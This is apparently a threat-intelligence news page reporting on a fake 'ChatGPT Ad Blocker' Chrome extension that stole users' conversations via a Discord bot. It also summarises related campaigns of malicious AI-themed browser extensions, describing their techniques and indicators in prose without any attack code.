Malicious ChatGPT Ad Blocker Chrome Extension Stole User Conversations
Researchers reported that a fake Chrome extension called "ChatGPT Ad Blocker" posed as a tool to remove ads from ChatGPT while secretly harvesting users' prompts and responses. The extension reportedly cloned the ChatGPT page DOM, extracted conversation text, and exfiltrated chats longer than 150 characters to a private Discord channel using a bot identified as Captain Hook, turning a supposed privacy tool into a straightforward data-theft mechanism.
The campaign appears to have capitalized on interest around ChatGPT advertising by luring users with bogus ad-blocking functionality. DomainTools linked the operation to suspicious domains including blockaiads.com, openadblock.com, and gptadblock.com, and found the extension checked a GitHub-hosted file hourly for remote instructions, suggesting active attacker control and the ability to update behavior over time. The developer account was reportedly tied to the handle krittinkalra and associated with AI platforms Writecream and AI4ChatCo, although no evidence was cited that those other apps also stole data.
Timeline
Apr 3, 2026
Technical analysis reveals Discord exfiltration and remote control behavior
Further reporting described how the extension sent conversations longer than 150 characters to a Discord bot named Captain Hook and checked a GitHub file hourly for remote instructions. Researchers also tied the extension to a developer account using the handle "krittinkalra" and warned users to avoid third-party tools associated with that developer.
May 8, 2023
Malicious 'ChatGPT Ad Blocker' extension campaign identified
DomainTools Investigations identified a malicious Chrome extension called "ChatGPT Ad Blocker" that impersonated an ad-blocking tool for ChatGPT while covertly stealing users' conversations. The extension cloned ChatGPT page content and exfiltrated prompts and responses to a private Discord channel, with infrastructure linked to domains such as blockaiads.com, openadblock.com, and gptadblock.com.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Sources
Related Stories
Malicious Chrome Extensions Steal ChatGPT and DeepSeek Conversations
Two rogue Chrome extensions, impersonating the legitimate AITOPIA AI sidebar tool, have compromised over 900,000 users by exfiltrating ChatGPT and DeepSeek conversations along with full browsing histories to attacker-controlled servers. The extensions, named "Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI" and "AI Sidebar with Deepseek, ChatGPT, Claude and more," request consent for "anonymous analytics" but covertly steal sensitive data, including proprietary code, business strategies, PII, and internal URLs. The malware operates by monitoring browser tabs, scraping chat content and session IDs, and sending Base64-encoded data to C2 servers every 30 minutes, exposing users to risks such as espionage, identity theft, and phishing. Researchers from OX Security discovered the threat, noting that the extensions remain available on the Chrome Web Store, with one losing its "Featured" badge after disclosure. The extensions also redirect users to each other if uninstalled, and their privacy policies are hosted on third-party sites to obscure their origins. The incident highlights the growing trend of browser extensions being used to capture AI chatbot conversations, a tactic dubbed "Prompt Poaching," and underscores the need for vigilance when installing browser add-ons, especially those requesting broad permissions under the guise of analytics or enhanced user experience.
1 months ago
Malicious Chrome Extensions Used for Credential Theft and Website Spoofing
Security researchers reported a surge in **malicious Chrome extensions** abusing high-privilege browser permissions to steal credentials and hijack authenticated sessions. LayerX identified at least **16 ChatGPT-related extensions** that mimic legitimate productivity tools and brands, then inject scripts into `chatgpt.com` to monitor outbound web requests and **exfiltrate authorization details and session tokens** to attacker-controlled infrastructure. With stolen tokens, attackers can impersonate victims’ ChatGPT sessions and potentially access connected data sources (e.g., integrations with *Slack* and *GitHub*), expanding impact beyond the AI service itself. Separately, Varonis documented a **malware-as-a-service** browser-extension toolkit dubbed **Stanley** being sold on Russian-language cybercrime forums, marketed to enable large-scale credential theft by **showing a phishing site while the URL bar continues to display the legitimate domain**. The toolkit uses a web-based control panel to configure per-victim “source” (legitimate) and “target” (phishing) URLs, then overlays a full-screen iframe to spoof the destination site; the seller also claims “guaranteed” placement in the **Chrome Web Store**, increasing the likelihood of user installation and enterprise exposure.
1 months ago
AiFrame Campaign: Fake AI Chrome Extensions Steal Credentials and Email Data
Researchers reported a coordinated campaign dubbed **AiFrame** involving 30+ malicious Google Chrome extensions masquerading as AI assistants (impersonating tools like **ChatGPT**, **Claude**, **Gemini**, and **Grok**) that collectively reached roughly **260,000–300,000 installs**. The extensions were found to **steal credentials, API keys, email content/messages, and browsing data**, and multiple items remained available in the Chrome Web Store at the time of reporting. LayerX attributed the set to a single operation based on shared code structure, permissions, and common command-and-control infrastructure under **`tapnetic[.]pro`** (including subdomains such as `claude.tapnetic.pro`). The extensions typically did not implement AI features locally; instead, they rendered a **full-screen iframe** that loaded remote content, enabling operators to change UI/logic and add capabilities without publishing an extension update. Reported high-install examples included **Gemini AI Sidebar** (`fppbiomdkfbhgjjdmojlogeceejinadg`, removed after reaching ~80k users) and apparent re-uploads/new IDs such as **AI Sidebar** (`gghdfkafnhfpaooiolhncejnlgglhkhe`, ~70k users), plus **AI Assistant** (`nlhpidbjmmffhoogcennoiopekbiglbp`, ~60k users, noted as having a “Featured” badge).
1 months ago